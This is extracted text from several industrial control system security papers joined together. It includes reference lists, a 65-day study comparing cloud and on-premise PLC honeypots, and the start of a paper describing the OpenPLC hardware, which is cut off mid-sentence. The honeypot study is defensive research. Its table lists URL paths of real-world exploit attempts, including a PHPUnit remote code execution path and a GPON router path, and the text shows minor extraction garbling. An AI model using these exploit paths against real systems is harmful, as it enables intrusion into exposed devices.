Security and Law, vol. 9, no. 1, p. 3, 2014. [15] R. Nardone, R. J. Rodr guez, and S. Marrone, Formal security assess- ment of modbus protocol, in 2016 11th International Conference for Internet Technology and Secured Transactions (ICITST). IEEE, 2016, pp. 142 147. [16] N. Tsalis, G. Stergiopoulos, E. Bitsikas, D. Gritzalis, and T. K. Apos- tolopoulos, Side channel attacks over encrypted tcp/ip modbus reveal functionality leaks. in ICETE (2), 2018, pp. 219 229.[17] C. Parian, T. Guldimann, and S. Bhatia, Fooling the master: Exploiting weaknesses in the modbus protocol, Procedia Computer Science, vol. 171, pp. 2453 2458, 2020. [18] Q. Bai, B. Jin, D. Wang, Y . Wang and X. Liu, "Compact Modbus TCP/IP protocol for data acquisition systems based on limited hardware resources," Journal of Instrumentation. 13(04):T04004-T04004. DOI: 10.1088/1748-0221/13/04/T04004. [19] R. Nardone, R. J. Rodr guez and S. Marrone, Formal security assess- ment of Modbus protocol, in Proceedings of the 2016 11th International Conference for Internet Technology and Secured Transactions (ICITST), pp. 142 147, IEEE, Barcelona, Spain, December 2016. [20] A. V olkova, M. Niedermeier, R. Basmadjian, and H. D. Meer, Security challenges in control network protocols: a survey, IEEE Communica- tions Surveys & Tutorials, vol. 21, no. 1, pp. 619 639, 2019. [21] L. Rosa, M. Freitas, S. Mazo, E. Monteiro, T. Cruz, and P. Sim es, A comprehensive security analysis of a SCADA protocol: from OSINT to mitigation, IEEE Access, vol. 7, Article ID 42156, 2019. [22] A. M. Abdul and S. Umar, Data integrity and security [DIS] based protocol for cognitive radio ad hoc networks, Indonesian Journal of Electrical Engineering and Computer Science, vol. 5, no. 1, pp. 187 195, 2017. [23] K. Rambabu and N. Venkatram, Contemporary af rmation of security and intrusion handling strategies of internet of things in recent literature, Journal of 9eoretical and Applied Information Technology, vol. 96, no. 9, pp. 2729 2744, 2018. [24] S. Bhatia, N. Kush, C. Djamaludin, A. Akande, and E. Foo, Practical modbus ooding attack and detection, in Proceedings of the Twelfth Australasian Information Security Conference (AISC 2014)[Conferences in Research and Practice in Information Technology, V olume 149], pp. 57 65, Australian Computer Society, Inc., Auckland, New Zealand, January 2014. [25] A. M. Abdul and S. Umar, Attacks of denial-of-service on networks layer of OSI model and maintaining of security, Indonesian Journal of Electrical Engineering and Computer Science, vol. 5, no. 1, pp. 181 186, 2017. [26] L. Rajesh and P. Satyanarayana, Detecting ooding attacks in commu- nication protocol of industrial control systems, International Journal of Advanced Computer Science and Applications, vol. 11, no. 1, 2020. [27] B. Chen, N. Pattanaik, A. Goulart, L. Karen, B. Purry, and D. Kundur, Implementing Attacks for Modbus/TCP Protocol in a Real-Time Cyber Physical System Test bed, in Proceedings of the 2015 IEEE Interna- tional Workshop Technical Committee on Communications Quality and Reliability (CQR), pp. 1 6, IEEE, Charleston, SC, USA, May 2015. [28] Tiegelkamp, M.; John, K. IEC 61131-3: Programming industrial automa- tion systems. Springer, 1995. [29] Attackers Deploy New ICS Attack Framework TRITON, and Cause Operational Disruption to Critical Infrastructure. Accessed: Apr. 12, 2021. [Online]. Available: https://www. reeye.com/blog/threat- research/2017/12/attackers-deploy-new-ics-attack-framework- triton.html. [30] W. Shang, Q. Qiao, M. Wan, and P. Zeng, Design and implementation of industrial rewall for modbus/TCP, JcP, vol. 11, no. 5, pp. 432 438, 2016. [31] I. N. Fovino, A. Carcano, M. Masera, and A. Trombetta, Design and implementation of a secure modbus protocol, in International conference on critical infrastructure protection. Springer, 2009, pp. 83 96. [32] A. Shahzad, M. Lee, Y .-K. Lee, S. Kim, N. Xiong, J.-Y . Choi, and Y . Cho, Real time MODBUS transmissions and cryptography security designs and enhancements of protocol sensitive information, Symmetry, vol. 7, no. 3, pp. 1176 1210, 2015. [33] J. Daemen and V . Rijmen, The design of Rijndael: AES-the advanced encryption standard. Springer Science & Business Media, 2013. [34] R. L. Rivest, A. Shamir, and L. Adleman, A method for obtaining digital signatures and public-key cryptosystems, Communications of the ACM, vol. 21, no. 2, pp. 120 126, 1978. [35] "Secure Hash Algorithm 2, National Institute of Standards and Tech- nology (NIST), Standard, 2002.CCNC 2023 WKSHPS: 5th International workshop on security trust privacy for cyber-physical systems (STP-CPS 23) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:39:00 UTC from IEEE Xplore. Restrictions apply.
Fake_PLC_in_the_Cloud_We_Thought_the_Attackers_Believed_that_How_ICS_Honeypot_Deception_Gets_Impacted_by_Cloud_Deployments.pdf
The Industrial Control System (ICS) industry faces an ever-growing number of cyber threats defence against which can be strengthened using honeypots. As the systems they mimic, ICS honeypots shall be deployed in a similar context to field ICS systems. This ICS context demands a novel honeypot deployment process, that is more consistent with real ICS systems. State-of- the-art ICS honeypots mainly focus on deployments in cloud environments which could divulge the true intent to cautious adversaries. This experimental research project addresses this limitation by evaluating the deception capability of a public cloud and an on-premise deployment. Results from a 65-day, HoneyPLC experiment show that the on-premise deployment attracts more Denial of Service and Reconnaissance ICS attacks. The results guide future researchers that an on-premise deploy- ment might be more convincing and attract more ICS-relevant interactions.
Fake PLC in the cloud, we thought the attackers believed that: How ICS honeypot deception gets impacted by cloud deployments? Stanislava Ivanova , Naghmeh Moradpoor School of Computing, Engineering and the Built Environment Edinburgh Napier University Edinburgh, UK [email protected] , [email protected] Index Terms Industrial Control Systems, Critical National Infrastructure, Programmable Logic Controllers, Supervisory Control & Data Acquisition, Industrial Honeypot I. I NTRODUCTION Operational Technology (OT) or Industrial Control Systems (ICS) has been considered secure for decades as it has been isolated by an air gap . This air gap is the space between the control systems and the organisation managing those systems, which has been guarded by fences and locked doors [5]. However, this gap has been closed by the increased convergence between IT and OT, which exposes ICS systems to a more significant risk [1]. Looking into one of the most advanced ICS attacks, the Stuxnet worm, revealed that one of the vulnerabilities leveraged by the worm received a public patch two years before the Stuxnet attack. That vulnerability was first discovered after being exploited by another well- known worm, the Conficker worm, revealing timely patching challenges. The recent war in Ukraine and subsequent cyber attacks on critical infrastructure show that targeting ICS tend to advance in combat [16]. IT security controls come in different forms where Defence- in-Depth is considered the best practice [2]. This strategy recommends a layered approach, to slow the attacker down while buying time for defenders to detect and respond to the attack. One of the defence layers that can improve security is honeypot [4]. Honeypots are systems designed to be breached.Their single purpose is to be compromised, making every attempt to connect to them suspicious [3]. This paper will address the efficiency of honeypot deploy- ment and specifically will investigate the following aims: To summarise the limitations of existing ICS honeypot deployments. To evaluate the impact of deploying ICS honeypot in the cloud versus on-premise through the experimental investigation. The structure of this study is as follows: The discussion of the Related Work in Section II is followed by Section III, which outlines the architecture design for the experimental work. The results and discussion are given in Section IV , followed by the conclusion in Section V . II. R ELATED WORK Available literature in the field of ICS honeypots focuses on different deployment infrastructures. These include, among others, public cloud deployments of ICS honeypots [8], [9] and on-premise deployments exposed to the internet [17]. However, to the best of our knowledge, the work in the ICS honeypot field is more focused on improving the functionality and complexity of the honeypots and less so on the deception impact of the deployment location. The following section presents current work on the ICS honeypot development, focusing on the deployment location the surveyed studies have implemented. Public cloud deployments are those using public cloud providers to minimise maintenance costs. This advantage makes cloud deployment a desirable method for most re- searchers despite the deployment s discrepancy from ICS native infrastructure. L opez-Morales et al. [8] improved a Honeyd-based honeypot to achieve a medium-interaction hon- eypot. This improvement is achieved by implementing an interactive web interface, S7Comm, web and SNMP services. The implementation is deployed in the cloud, where four attacks are recorded. A hybrid ICS honeypot implementation is deployed in a hosting company by You et al. [9]. The cloud deployment is connected with an on-site deployment with physical PLCs,2023 IEEE 19th International Conference on Factory Communication Systems (WFCS) | 978-1-6654-6432-1/23/$31.00 2023 IEEE | DOI: 10.1109/WFCS57264.2023.10144119 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:29 UTC from IEEE Xplore. Restrictions apply. hence, the hybrid nature of the honeynet. The cloud front end handles a list of predefined ICS protocol requests while the back-end PLCs handle the rest, bringing novelty to the ICS honeypot development. However, this deployment fails to acknowledge that recognising a PLC honeypot by observing the cloud infrastructure is trivial. Lastly, Rashid et al. [18] propose a multi-platform honeypot, which includes a Conpot-based ICS honeypot. The experiment which is deployed in the public cloud collects a limited amount of interactions on the PLC interface which brings unconvincing results. The related work surveyed here focused on advancing the functionality and sophistication of the ICS honeypots. However, few acknowledge the deployment location role in the honeypot deception capability. Honeypot sophistication efforts bring little value without consistently deceptive deployment location, and vice versa. To the best of our knowledge, none of the present research measures the deployment affect that cloud deployment might have on the deception capability of ICS honeypots. TABLE I LITERATURE REVIEW OF EXISTING WORK IN ICS HONEYPOT DEVELOPMENT Year Title Attacks Deployment 2020 HoneyPLC: A next-generation honeypot for industrial control systems [8]Four Public cloud 2021 HoneyVP: A cost-effective hybrid honeypot architecture for industrial control systems [9]None Public cloud 2022 Faking smart industry: exploring cyber-threat landscape deploying cloud-based honeypot [18]None Public cloud 2023 This paper One On-premise In this study, we propose a novel implementation of Hon- eyPLC, which, unlike the study by L opez-Morales et al. [8], deploys HoneyPLC on a hardware device on-premise. Our improvement differs from the proposed implementations by You et al. [9] and Rashid et al. [18], deployed in the cloud. Thus, it evaluates the deployment method s role in the amount of valuable attack data attracted. Finally, this paper proposes a honeypot installation approach on a physical machine, where a more recently developed honeypot, HoneyPLC, is used. III. E XPERIMENT ARCHITECTURE An ICS honeypot covert deployment shall start with an ICS consistent deployment as suggested by the authors of Rowe et al. [6]. The election of which, if not selected well, may turn away a potential attacker before interacting with the ICS honeypot. An attacker interacting with the honeypot shall have a similar experience to a real-world ICS device [6]. The detail of the honeypot interfaces is a key to deceiving the attacker or public scanners (e.g. Shodan.io). Reconnaissance tools like Shodan, use a HoneyScore evaluation algorithm to evaluate if an internet-exposed system is a disguised honeypot. Shodanuses a proprietary algorithm to calculate a number from 0.0 to 1.0 to distinguish honeypots (when the score is close to 1.0) from genuine systems (honeyscore is close to 0.0) [6]. Shodan-identified honeypots often have Shodan-attached tags like cloud or hosting and honeypot together. The honeypot selected for this experiment is HoneyPLC, which provides medium interaction, which is more deceptive than low interaction. It also allows cost-efficient deployment on a physical machine without the unnecessary complexity of a high-interaction honeypot. The experiment s setup presented in Figure 1 comprises a physical machine running Ubuntu 18.04 LTS and HoneyPLC server in a residential building in Aarhus, Denmark. A managed switch replicates the HoneyPLC traffic and mirrors that traffic to the Logging machine . A router with a residential internet line forwards the ports of the HTTP and S7Comm services, listening on a static IP and TCP ports 80 and 102. Fig. 1. Private infrastructure deployment. An identical infrastructure is deployed in a public cloud provider in Frankfurt, Germany. This setup is implemented to create the basis for experimental evaluation to validate the efficacy of the different methods of the deployments. The main difference with the cloud setup is implementing a gateway server - a port-filtering device. A dedicated machine performs the collection to maintain data integrity. This machine logs all packets from the Hon- eyPLC. As depicted in Figure 1, a switch has been used between the HoneyPLC and the Gateway to replicate the HoneyPLC traffic. The logging machine uses Wireshark , a packet capture tool that sniffs packets transmitted or received on a network interface [10]. Once irrelevant packets are filtered, a Packet Capture (PCAP) file with internet-initiated connections is present. At this point, the PCAP file is a collection of relevant and irrelevant traffic. A method inspired by Ferretti et al. [7] is adapted to this project s needs and used to filter and analyse the traffic. The method includes: 1) Inputting raw traffic into Wireshark to filter and analyse only relevant information. 2) Identify scanners - remove duplicate IP addresses, cor- relate IP addresses with owner names using Wireshark integrated name resolution (DNS PTR records). Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:29 UTC from IEEE Xplore. Restrictions apply. 3) Manually observe and extract a list of scanner IP ad- dresses. 4) Use the generated list to filter out all packets associated with scanners and crawlers. 5) Observe the remaining traffic for attack patterns. Filter on ICS protocol: S7Comm. Data from the on-premise deployment gains meaning only when juxtaposed with the data collected from the cloud deployment. Therefore, a cloud HoneyPLC deployment is im- plemented for reference. Cloud deployment data collection and analysis are logically identical to the on-premise deployment. IV. R ESULTS AND DISCUSSION The experiment conducted was of two identical HoneyPLC deployments: one in the cloud and the second on-premise. Both deployments collected data for 65 days, from November 2022 until January 2023. Both deployments followed the instruction provided by the HoneyPLC creators [8]. The results collected are grouped based on common characteristics. The first step is to enumerate the public scanners interacting with the deployments. The public scanners often will not ac- cumulate targeted attacks but will enumerate online devices by sending requests or probes and analysing the responses. Some internet scanners might specifically look for ICS devices to inform agencies. Wireshark s built-in resolution capability was used to distinguish the internet scanners. This feature resolves IP addresses to domain names, which later can be correlated to organisations. Figure 2 depict how many unique IP addresses communicate with the cloud and on-premise deployment. It also shows how many IP addresses are associated with well- known scanners. Additionally, the table shows the top scanner organisation, Shadowserver. Fig. 2. Well-known scanners unique IP addresses Unique IP addressesTotal scanner IP addressesshadowserver.org 4,568797326 3,421807338 Cloud On-premise Geolocating the origin of traffic is sometimes helpful in tracking trends. Wireshark, MaxMind database is used to map the IP addresses with a country of origin [11]. When comparing the interest in both deployments a shift can be observed. Namely, the second most Web service-interacting country with the cloud deployment is the UK, whereas the second most Web service-interacting country with the on- premise deployment is Germany. Once exploring the ICS- interacting country measures, the source country changes to China on second place, where the USA consistently stays the country interacting the most with both deployments, regardless of the listening service. The difference in ICS interactions is observed in the third most common source country, which for cloud is the UK, and for on-premise is Portugal. IP addressoriginating from any specific country does not mean that the interaction origin is from that country, as devices in foreign countries can be compromised and later used as proxies to hide the origin. The experiment exposed two services each: HTTP and S7Comm. HTTP is a common service traditionally deployed both in the cloud and on-premise. However, S7Comm is the service associated with ICS devices which is the honey to this honeypot. Table II depicts the number of unique IP addresses interacting with both services and which of those did not belong to scanners. The ICS-related traffic is filtered by protocol: S7Comm. Table II depicts the number of exploit attempts and the number of scanners and non-scanners IP addresses interacting with the S7Comm protocol. Even though the S7Comm interactions amount was significantly smaller than the HTTP interactions, the recorded activity is more relevant to the ICS device. This activity is directly linked with ICS interest which means it can be used to measure ICS deception effectiveness. The on-premise deployment attracts multiple attacks originating from a single IP address, indicat- ing the deception advantage of the deployment. Attacks in this study are the requests for PLC memory Read, Stop and Start commands. The PLC Stop and Start commands are considered attacks as they can potentially impact the availability of the PLC - an attack type called a Denial of Service attack. The PLC memory Read requests is an activity seen in the reconnaissance phase of an attack. TABLE II HTTP AND S7C OMM INTERACTIONS WITH CLOUD AND ON -PREMISE DEPLOYMENT HTTP - unique IP addr.HTTP - non- scanner IP addr.HTTP - unique exploit interac- tionsS7Comm - unique IP addr.S7Comm IP addr. - non- scanner inter- actionsPLC inter- ac- tions (at- tacks) On- premise1488 1199 501 154 53 116 (28) Cloud 2054 1790 1810 144 70 80 (0) Table II depicts that the HTTP service attracts more atten- tion to cloud deployment. The number of unique IP addresses and even non-scanner addresses that interact with the cloud deployment almost doubles. In addition, the number of HTTP unique exploit interactions is triple on the cloud deployment. However, when performing the deep analysis in the following part, it becomes evident that those HTTP interactions are irrelevant to the ICS device. When observing the interactions with the S7Comm service, an interaction shift is observed from the cloud towards on- premise. The on-premise deployment attracts more unique IP addresses than the cloud deployment, which send PLC memory read or PLC Stop and Start requests which are also considered malicious. There were two compelling types of interactions observed in the results. First, the HTTP exploit interactions. Those in- Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:29 UTC from IEEE Xplore. Restrictions apply. TABLE III RECORDED HTTP EXPLOIT ATTEMPTS AGAINST CLOUD AND ON -PREMISE DEPLOYMENT Malicious URL Exploit description Reference /boaform/admin/ formLo- ginFiber Optic Routers ex- ploit[12] /vendor/phpunit/ phpunit/src/Util/ PHP/eval-stdin.phpPHP exploit - Remote Code Execution[13] /Autodiscover/ Autodiscover.xmlOutlook Web App that has autodiscover enabled ex- ploit[14] /GponForm/diag Form ?images/Vulnerability in GPON home routers exploit[15] teractions were coming from devices that attempted to exploit known vulnerabilities in systems that are publicly exposed. Table III lists the HTTP exploits attempted against both the cloud and the on-premise deployments. None of the observed exploit attempts succeeded as they would work with different types of destinations. It is hard to say why was the cloud deployment exposed to more exploit attempts. One possible explanation is that web applications like Citrix, WordPress, Apache and Outlook are often deployed in the cloud, making adversaries look for them in the cloud. Other irrelevant exploit attempts were recorded. For exam- ple, it is unclear why an exploit of a Fiber Optic Router or GPON router, as shown in Table III, was attempted against the cloud. GPON routers are typically residential devices. One possible explanation is that the exploit traffic was generated by worms looking for vulnerable devices. Even though these interactions provide some intelligence into what vulnerabilities are exploited in the wild, it is of little value for an ICS/OT- specific threat intelligence. Analysing the HTTP service interaction, the attacks yield IT-relevant results which are not ICS related. The S7Comm protocol offers specific ICS-related results. Only 10% of the unique IP addresses interacted with S7Comm, as shown in Table II. On a closer look, this traffic is formed of recon- naissance activities that read the PLC memory blocks. These readings can be used to understand the present logic running on the PLC. Such information can be used further to help adversaries to develop an exploit. The observed interactions with the ICS protocol provide valuable intelligence for the parties that studied the ICS de- ployments. Furthermore, a PLC Stop and Start attempt shows that the on-premise deployment deceives an adversary. Payload deployment has not been observed (Ladder Logic Capture), and no ICS-targeted HTTP exploitation has been observed. V. C ONCLUSION This study has proposed a deployment shift of ICS honey- pots from the cloud to on-premise, arguing that on-premise and physical deployments collect more relevant data than their cloud counterparts. The signs of inefficient ICS honeypot deployments are data that is not actionable. The experiment evaluates the deployment effects of ICS honeypots by runninga 65-day internet exposure and data collection. The exper- iment includes comparing a medium-interaction honeypot, HoneyPLC, deployed in two different environments: cloud and on-site. The paper demonstrates that ICS honeypots will inevitably attract mainly unrelated web application-specific or scanner traffic. Based on the observed results, such honeypots will often collect irrelevant data. However, the on-premise deployment attracts multiple attacks. This finding informs the future development of the current work in progress to validate the deployment impact on deception capability. This validation shall be achieved by adding a third experiment deployment - a physical PLC to serve as a control group for the expected interactions. Based on these conclusions, practitioners shall consider ICS honeypot deployment on-premise as it mimics the expected infrastructure of ICS systems. ACKNOWLEDGMENT This research is supported by the School of Computing, Engineering & the Built Environment at Edinburgh Napier University. REFERENCES [1] G. Murray, M. Johnstone and C. Valli, The convergence of IT and OT in critical infrastructure, 2017, unpublished. [2] A. Mosteiro-Sanchez, M. Barcelo, J. Astorga, A. Urbieta, Securing IIoT using defence-in-depth: towards an end-to-end secure industry 4.0, Journal of Manufacturing Systems, vol. 57, 2020, pp. 367 378. [3] N. Provos, Honeyd-a virtual honeypot daemon, 10th dfn-cert work- shop, Hamburg, Germany, vol. 2, 2003, pp. 4. [4] I. Mokube and M. Adams, Honeypots: concepts, approaches, and challenges, Proc. of the 45th annual southeast regional conf., 2007, pp. 321 326. [5] T. Dinapoli, Industrial Control Systems Cybersecurity, 2019. [6] N. C. Rowe, T. D. Nguyen, M. M. Kendrick, Z. A. Rucker, D. Hyun and J. C. Brown, Creating effective industrial-control-system honeypots, American Journal of Management, 2020, vol. 20, pp. 112 123, in press. [7] P. Ferretti, M. Pogliani and S. Zanero, Characterizing background noise in ICS traffic through a set of low interaction honeypots, Proc. of the ACM Workshop on Cyber-Physical Systems Security & Privacy, 2019, pp. 51 61, in press. [8] E. L opez-Morales, C. Rubio-Medrano and A. Doup e, Y . Shoshitaishvili, R. Wang, T. Bao and G. Ahn, HoneyPLC: A next-generation honeypot for industrial control systems, Proc. of the 2020 ACM SIGSAC Conf. on Comp. and Comm. Security, 2020, pp. 279 291, in press. [9] J. You, S. Lv, Y . Sun, H. Wen and L. Sun, HoneyVP: A cost-effective hybrid honeypot architecture for industrial control systems, ICC 2021- IEEE Int. Conf. on Comm., 2021, pp. 1 6, in press. [10] U. Lamping and E. Warnicke, Wireshark user s guide, International, vol. 4, 2004, unpublished. [11] Ashiyane Digital Security Team, GeoIP2, 2022, MaxMind, unpub- lished. [12] shellord, Netlink GPON Router 1.0.11 - Remote Code Execution, Exploit Database, 2020, unpublished. [13] CVE Details, CVE-2017-9841, 2017, unpublished. [14] Anonymous, inurl:autodiscover/autodiscover, Exploit Database, 2016, unpublished. [15] VPN Mentor, Critical RCE Vulnerability Found in Over a Million GPON Home Routers, 2022, unpublished. [16] Reuters, Ukraine blames Russia for most of over 2,000 cyberattacks in 2022, 2023, unpublished [17] C. Zhao and S. Qin, A research for high interactive honepot based on industrial service, 2017 3rd IEEE Int. Conf. on Computer and Communications (ICCC), 2017, pp. 2935 2939, in press. [18] S. Rashid, A. Haq, S. Hasan, M. Furhad, M. Ahmed A. Ullah, Faking smart industry: exploring cyber-threat landscape deploying cloud-based honeypot, Wireless Networks, 2022, pp. 1-15, in press Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:29 UTC from IEEE Xplore. Restrictions apply.
OpenPLC_An_open_source_alternative_to_automation.pdf
Companies are always looking for ways to increase production. The elevated consumerism pushes factories to produce more in less time. Industry automation came as the solution to increase quality, production and decrease costs. Since the early 70s, PLC (Pro grammable Logic Controller) has dominated industrial automation by replacing the relay logic circuits. However, due to its high costs, there are many places in the world where automation is still inaccessible. This paper describes the crea tion of a low-cost open source PLC, comparable to those already used in industry automation, with a modular and simplified architecture and expansion capabilities. Our goal with this project is to create the first fully functional standardized open source PLC. We believe that, with enough help from the open source community, it will become a low cost solution to speed up development and industrial production in less developed countries.
OpenPLC: An Open Source Alternative to Automation Thiago Rodrigues Alves, Mario Buratto, Flavio Mauricio de Souza , Thelma Virginia Rodrigues Departamento de Engenharia Eletr nica e de Telecomunica es PUC Minas Belo Horizonte, Brazil [email protected] Keywords PLC; OpenPLC; Automation; MODBUS; Open source I. INTRODUCTION In early 60s, industrial automation was usually composed of electromechanical parts like relays, cam timers and drum sequencers. They were interconn ected in electrical circuits to perform the logical control of a machine. To change a machine logic was to make an intervention on its electrical circuit, which was a long and complicated process. In 1968, the Hydra-Matic of General Motors requested proposals for an electronic replacement for hard-wired relay systems. The winning proposal came from Bedford Associates with their 084 project. The 084 was a digital controller made to be tolerant to plant floor conditions, and was latter known as a Programmable Logic Controller, or simply PLC [1]. Within a few years, the PLC started to spread all over the automotive industry, replacing relay logic machines as an easier and cheaper solution, a nd becoming a standard for industrial automation. There is a strict relation between automation and development. In less developed countries, the greatest barriers are knowledge and cost. Industrial controllers are still very expensive. Companies don t provide detailed information about how these controllers work internally as they are all closed source. The OpenPLC was created to break these two barriers, as it is fully open source and open hardware. It means that anyone can have access to all pro ject files and information for free. This kind of project helps spread technology and knowledge to places that need t he most. Also, the OpenPLC is made with inexpensive components to lower its costs, opening doors to automation where it wasn t ever possible before. II. T HE PLC ARCHITECTURE The PLC, being a digital controller, shares common terms with typical PCs, like CPU, memory, bus and expansion. But there are two aspects of the PLC that differentiate them from standard computers. The first one is that its hardware must be sturdy enough to survive a rugged industrial atmosphere. The second is that its software must be real time. A. Hardware With the exception of Brick PLCs that are not modular, the hardware of a usual PLC can be divided into five basic components: - Rack - Power Supply - CPU [Central Processing Unit] - Inputs - Outputs Like a human spine, the rack has a backplane at the rear allowing communication between every PLC module. The power supply plugs into the rack providing a regulated DC power to the system. The CPU is probably the most important module of a PLC. It is responsible for processing the information received from input modules and, according to the programmed logic, send impulses to the output modules. The CPU holds its program on a permanent storage, and uses volatile memory to perform operations. The logic stored in CPU s memory is continuously processed in an infinite loop. The time needed to complete a cycle of the infinite loop is called scan time. A faster CPU can achieve shorter scan time. Input modules are used to read signals of sensors installed at the field. There are many types of input modules, depending on the sensor to be read, but they can generally be split into two categories: analog and di gital. Digital input modules can handle discrete signals, generated by devices that are either on or off. Analog input modules convert a physical quan tity to a digital number that can be processed by the CPU. This process of conversion is usually made by an ADC [Analog to Digital Converter] inside the analog input module. The type of the physical quantity to be read determines the type of the analog input module. For example, depending on the sensor, the physical value can be expressed in voltage, current , resistance or capacitance. Similarly to the input modules, output modules can control devices installed at the field. Digital output modules 978-1-4799-7193-0/14/$31.00 2014 IEEE 585 IEEE 2014 Global Humanitarian Technology Conference Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply. can control devices as if on-off switches. Analog output modules can send different values of voltage or current to control position, power, pressure or any other physical parameter. As the most significant feature of a PLC is robustness, each module must be designed with protections such as short circuit, over current and over voltage protections. It is also important to include filter against RF noise. B. Software PCs, by design, are made to handle different tasks at the same time. However, they have difficulty handling real time events. To have an effective cont rol, PLCs must be real time. A good definition of real time is any information processing activity or system which has to respond to externally generated input stimuli within a finite and specified period [2]. Real time systems don t nece ssarily mean to be fast. They just need to give an answer bef ore the specified period known as deadline. Systems without real time facilities cannot guarantee a response within any t imeframe. The deadline of a PLC is its scan time, so that all responses must be given before or at the moment scan reaches the end of the loop. There are many accepted langua ges to program a PLC, but the most widely used is called ladder logic, which follows the IEC 61131-3 standard [3]. Ladder logic (see Fig. 1) was originally created to document the design and construction of relay logic circuits. The name came from the observation that these diagrams resemble ladders, with two vertical bars representing rails and many horizontal rungs between them. These electrical schematics evolved into a programming language right after the creation of the PLC, allowing technicians and electrical engi neers to develop software without additional training to learn a computer language, such as C, BASIC or FORTRAN. Fig. 1. Example of a ladder logic diagram Every rung in the ladder logic represents a rule to the program. When implemented with relays and other electromechanical devices , all the rules execute simultaneously. However, when the diagram is implemented in software using a PLC, every rung is processed sequentially i n a c o n t i n u o u s l o o p ( s c a n ) . T h e s c a n i s c o m p o s e d o f t h r e e phases: 1) reading inputs, 2) processing ladder rungs, 3) activating outputs. To achieve t he effect of simultaneous and immediate execution, outputs are all toggled at the same time at the end of the scan cycle. III. T HE OPENPLC HARDWARE ARCHITECTURE The OpenPLC (see Fig. 2) was created based on the architecture of actual PLCs on the market. It is a modular system, with expansion capabilities, an RS-485 bus for communication between modules and hardware protections. To create the first OpenPLC prototype, four boards were built: - Bus Board - CPU Card - Input Card - Output Card Fig. 2. The OpenPLC Prototype A. Bus Board The bus board acts like a rack, with an integrated 5VDC power supply. Each module connects to the bus board through a DB-25 connector. The communication between modules is made over an RS-485 bus, whose lines are on the bus board. Caution was taken, while routing the RS-485 lines, to avoid communication problems. Fig. 3 shows the pins and connections of each slot of the bus board. The 24V and RS-485 ground was separated from the rest of the circuit ground to isolate short circuits on these lines. T o a l l o w m o r e c u r r e n t t o f l o w t h r o u g h t h e p o w e r l i n e s , the respective pins were duplicat ed. Three pins were used for physical address, so that the module connected on a particular slot would know its physical position on the bus board. These pins were called D0, D1 and D2, being hardcoded with logic 1 or 0 in a binary sequence, creating different numbers from 0 to 7, one number for each slot. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply. Fig. 3. Bus Board DB-25 connections B. CPU Card The OpenPLC s brain is the CPU card. It was important to use a processor that was inexpensive, fast enough to handle all PLC operations, and most importantly, actively supported by the open source community. After some research, the processor selected was the AVR ATmega2560. This microcontroller is a high-performance, low-power Atmel 8-bit AVR RISC-based microcontroller that combines 256KB ISP flash memory, 8KB SRAM, 4KB EEPROM, 86 general purpose I/O lines, 32 general purpose working registers, real time counter, six flexible timer/counters with compare modes, PWM, 4 USARTs, byte oriented 2-wire serial interface, 16-channel 10-bit A/D converter, and a JTAG interface for on-chip debugging. The device achieves a throughput of 16 MIPS at 16 MHz and operates b etween 4.5-5.5 volts [4]. The biggest reason for this choice was that the ATmega2560 is used on the Arduino family [5], a large open source community for rapid electronic prototyping, with an advanced programming language called Wiring. By using this processor we made the OpenPLC compatible with Arduino code, including hundreds of libraries written for it. The CPU card also includes another important IC (Integrated Circuit), the Wizn et W5100, responsible for Ethernet communication. The Wiznet W5100 supports hardwired TCP/IP Protocols like TCP, UDP, ICMP, IPv4 ARP, IGMP, PPPoE and Ethernet 10BaseT/100BaseTX, has 16KB of internal memory for Tx/Rx buffers and accepts serial (over SPI) or parallel interface. This is also the Ardui no Ethernet Shield official IC, enabling us to reuse all the code written for it on the OpenPLC. In order to communicate w ith the PC and download programs, the OpenPLC uses an USB port. The FT232RL from FTDI Devices converts Serial Rx/Tx lines to USB standard. The Arduino Mega bootloader is used to upload code to the CPU over the USB circuit. C. Input Card The Input card is a digital input module for the OpenPLC. To process the digital inputs r ead by the conditioning signal circuit and send them to the CPU card, the input card uses the AVR ATmega328P, a microcontroller with the same core of the CPU card. This made the reutilization of parts of code written for the CPU card, especially code related to communication over the RS-485 bus possible. The input signal conditioning circuit is composed mainly by an optocoupler, used to isolate the input signals and the control signals. The circuit of each input can be seen on Fig. 4. When a stimulus is made between E1+ and E1-, a current flow through the input resistor and activates the internal LED of the optocoupler. The photons emitted by the internal LED are sensed by the phototransisto r, which creates a path for the current from 5VCD to ground, sending logic 0 to inverter s input. As the inverter must invert the logic signal, a logic 1 is received by the microcontroller, indicating that a digital stimulus was made at the input. The input card has 8 isolated input circuits, so that each module can read up to 8 digital signals at the same time. The state of each input is sent to the CPU card, over the RS-485 bus, to be processed according to the ladder logic. Fig. 4. Isolated input circuit from the Input Card D. Output Card Each Output card has 8 relay-b ased outputs driving up to 8 loads at the same time. It has double isolated outputs, as they are isolated by an optocoupler (just like the Input card) and the relay itself, which gives an additional layer of isolation. Fig. 5 shows the circuit of one isolated output from the Output card. As digital processors are better sinking current than sourcing, the cathode of the optocoupler s internal LED is connected to an output pin on the ATmega328P. While the output pin remains with logic 1, no current flows through the LED. If the output pin goes to logic 0, a current is drawn on that pin, activating the optocoupler s internal LED. The internal phototransistor is connected to an external BC817 transistor in a Darlington configuration to increase gain. When photons are sensed by the internal phototransistor, both transistors are polarized, energizing the relay s coil. Without photons, there isn t any current flowing through the coil, and the relay remains off. Fig. 5. Isolated output circuit from the Output Card Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:57 UTC from IEEE Xplore. Restrictions apply. E. Protections There are five types of protections used in the OpenPLC circuit: - Current limiting protection with PPTC [Polymeric Positive Temperature Coefficient] - Over-voltage protection with TVS [Transient Voltage Suppression diode] - Ground isolation - Reverse polarity protection - Noise filters Every input and output (including the power input at the Bus board) has protection against over-voltage and short circuit. These protections are achieved by using a PPTC in series with the circuit input and a TVS diode in parallel. When a high current flows through the PPTC, it reaches a high resistance with a low holding current, protecting the circuit in series. When the current is removed, it cycles 